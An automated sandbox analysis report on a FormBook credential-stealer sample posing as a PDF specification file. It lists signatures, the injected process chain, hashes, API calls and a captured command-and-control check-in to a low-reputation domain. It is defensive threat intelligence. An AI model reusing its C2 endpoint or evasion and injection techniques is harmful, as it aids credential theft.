Windows Analysis Report
HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe

Overview

General Information

Sample name: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
Analysis ID: 1569166
MD5: 0f4c38f8def111c7fdb237b985c66ca0
SHA1: 18add6ba22e3c62913161dd98a39458a9e753713
SHA256: b06fc744b4cfd48aeda3eabc2cba8a079b02a9d908920b6944130c6b950e8891
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe (PID: 2324 cmdline: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe" MD5: 0F4C38F8DEF111C7FDB237B985C66CA0)
    • svchost.exe (PID: 7244 cmdline: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • RAVCpl64.exe (PID: 7548 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • newdev.exe (PID: 3352 cmdline: "C:\Windows\SysWOW64\newdev.exe" MD5: 775D479963E7ED5969665E44D8859438)
          • firefox.exe (PID: 2788 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

              System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", CommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", CommandLine|base64offset|contains: B, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", ParentImage: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, ParentProcessId: 2324, ParentProcessName: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", ProcessId: 7244, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", CommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", CommandLine|base64offset|contains: B, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", ParentImage: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, ParentProcessId: 2324, ParentProcessName: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe", ProcessId: 7244, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T15:21:49.570313+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49739 | 172.67.134.42 | 80 | TCP

              AV Detection

Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, ReversingLabs: Detection: 47%
Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Joe Sandbox ML: detected
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: wntdll.pdbUGP source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6124352718.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6122007860.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6481941965.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6484713548.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003D2D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6565523666.00000000047EB000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6570069236.0000000004993000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6124352718.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000003.6122007860.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.6566665422.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6481941965.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6484713548.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.6566665422.0000000003D2D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, newdev.exe, 00000003.00000002.6805398379.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6565523666.00000000047EB000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6805398379.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6570069236.0000000004993000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: NewDev.pdbGCTL source: svchost.exe, 00000001.00000003.6534482142.000000000362A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534458151.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534284497.000000000361B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: NewDev.pdb source: svchost.exe, 00000001.00000003.6534482142.000000000362A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534458151.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.6534284497.000000000361B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_00386CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00386CA9
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_003860DD FindFirstFileW,DeleteFileW,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_003860DD
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_003863F9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose, 0_2_003863F9
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_0038EB60 FindFirstFileW,FindNextFileW,FindClose, 0_2_0038EB60
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_0038F56F FindFirstFileW,FindClose, 0_2_0038F56F
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_0038F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 0_2_0038F5FA
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_00391B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00391B2F
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_00391C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00391C8A
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_00391F94 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00391F94
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then mov ebx, 00000004h, 1_2_04D104CE
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 4x nop then mov ebx, 00000004h, 2_2_032A64CE
Source: C:\Windows\SysWOW64\newdev.exe, Code function: 4x nop then mov ebx, 00000004h, 3_2_049304CE

              Networking

Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49739 -> 172.67.134.42:80
Source: DNS query: www.topkapiescortg.xyz
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_00394EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_00394EB5
Source: global traffic, HTTP traffic detected:
GET /cz1i/?XV=QNGNUsgi9ans25&VT3s=lCWtxBlDPSCNJhRz7147v4YzJ6rIzSVGmK+Kme085vCDtUrqSJqQP+YtwYINSw3lRTDSNZCzyCPLZyeariLf2RdsyM6VIL0C/A8nWtsFZVjXlXjChXabsak= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.topkapiescortg.xyz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: www.topkapiescortg.xyz
Source: global traffic, HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 14:21:49 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZH5wQpO6H194y%2BaZLyRpkLRI4RSMTwlhkgwSjKBdBM9q02tes%2FcoywC%2BSCIf%2FirNo%2FJkMTOUthCWHLX6lHxA73c4cH44sRjzMAa5b4iBJOWbQr1JtAlFNzad8h%2FEO%2FHT6EXLeqbxkXO"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed4af4eda1d3346-MIA
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=124553&min_rtt=124553&rtt_var=62276&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=480&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: E8-03HaL.3.dr, String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.dr, String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: E8-03HaL.3.dr, String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://gemini.google.com/app?q=
Source: newdev.exe, 00000003.00000003.6743657382.0000000000B82000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6743657382.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6803895083.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6743835728.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/
Source: newdev.exe, 00000003.00000003.6743657382.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6803895083.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6743835728.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com//
Source: newdev.exe, 00000003.00000003.6743657382.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/https://login.live.com/
Source: newdev.exe, 00000003.00000003.6743657382.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000002.6803895083.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6743835728.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/v104
Source: newdev.exe, 00000003.00000002.6803895083.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
Source: newdev.exe, 00000003.00000003.6742668125.0000000007E6A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.dr, String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.dr, String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.ecosia.org/newtab/
Source: newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.dr, String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_00396B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00396B0C
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_00396D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00396D07
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_00396B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00396B0C
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_00382B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00382B37
Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: 0_2_003AF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_003AF7FF

              E-Banking Fraud

Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              System Summary

Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, Code function: This is a third-party compiled AutoIt script. 0_2_00343D19
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, String found in binary or memory: This is a third-party compiled AutoIt script.
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp, String found in binary or memory: This is a third-party compiled AutoIt script. memstr_2f7b9e90-6
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp, String found in binary or memory: 7SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_0ee99350-b
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, String found in binary or memory: This is a third-party compiled AutoIt script. memstr_17bafc97-f
Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_8c4455c6-c
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C743 NtClose,1_2_0042C743
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BC0 NtQueryInformationToken,LdrInitializeThunk,1_2_03C72BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72A80 NtClose,LdrInitializeThunk,1_2_03C72A80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EB0 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03C72EB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D10 NtQuerySystemInformation,LdrInitializeThunk,1_2_03C72D10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C734E0 NtCreateMutant,LdrInitializeThunk,1_2_03C734E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74260 NtSetContextThread,1_2_03C74260
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74570 NtSuspendThread,1_2_03C74570
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BE0 NtQueryVirtualMemory,1_2_03C72BE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B80 NtCreateKey,1_2_03C72B80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B90 NtFreeVirtualMemory,1_2_03C72B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B00 NtQueryValueKey,1_2_03C72B00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B10 NtAllocateVirtualMemory,1_2_03C72B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B20 NtQueryInformationProcess,1_2_03C72B20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AC0 NtEnumerateValueKey,1_2_03C72AC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AA0 NtQueryInformationFile,1_2_03C72AA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72A10 NtWriteFile,1_2_03C72A10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C729D0 NtWaitForSingleObject,1_2_03C729D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C729F0 NtReadFile,1_2_03C729F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FB0 NtSetValueKey,1_2_03C72FB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F00 NtCreateFile,1_2_03C72F00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F30 NtOpenDirectoryObject,1_2_03C72F30
